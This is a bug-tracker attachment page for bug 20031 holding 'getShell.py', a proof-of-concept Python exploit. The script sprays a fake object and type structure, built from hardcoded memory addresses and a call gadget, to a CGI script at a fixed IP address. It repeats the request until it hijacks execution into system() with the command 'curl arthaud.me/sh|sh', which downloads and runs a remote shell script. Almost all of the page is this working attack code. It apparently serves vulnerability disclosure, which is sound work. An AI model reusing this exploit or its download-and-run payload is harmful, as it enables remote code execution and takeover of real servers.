Attachment 8842 Details for Bug 20031 – POC for this bug, Python script to get a remote shell.

POC for this bug, Python script to get a remote shell.

getShell.py (text/plain), 873 bytes, created by Lewis Smith on 2017-01-08 15:17:40 CET

(hide)

Description:

Filename:

MIME Type:

Creator: Lewis Smith

Created: 2017-01-08 15:17:40 CET

Size: 873 bytes

patch

obsolete

import struct
import requests
  
def p(v):
    return struct.pack('<I', v)
       
cmd = b'curl arthaud.me/sh|sh\x00'

system_addr = 0x0805a2f0
call_gadget = 0x81580d6 # push edx; call [eax + 0x18]
fake_object_addr = 0x84d673c
fake_type_addr = fake_object_addr + 0x1c

fake_object = p(1) # ref counter
fake_object += p(fake_type_addr) # type object
fake_object += b'\x00' * 16
fake_object += p(system_addr)

assert len(cmd) <= 24
fake_type = cmd.ljust(24, b'\x00')
fake_type += p(call_gadget)

payload = b'I' * 32
payload += p(fake_object_addr)

data = (fake_object + fake_type) * 500

qs = 'key=' + 'A' * 16
qs += '&mode=1'
qs += '&iv=' + ''.join('%%%02x' % c for c in payload)
qs += '&x=' + ''.join('%%%02x' % c for c in data)

i = 1
while True:
    print('\rAttempt %d' % i, end='')
    i += 1
    requests.get('http://136.243.194.56:8000/cgi-bin/cryptmsg.py?%s' % qs)

Actions: View

Attachments on bug 20031: 8841 | 8842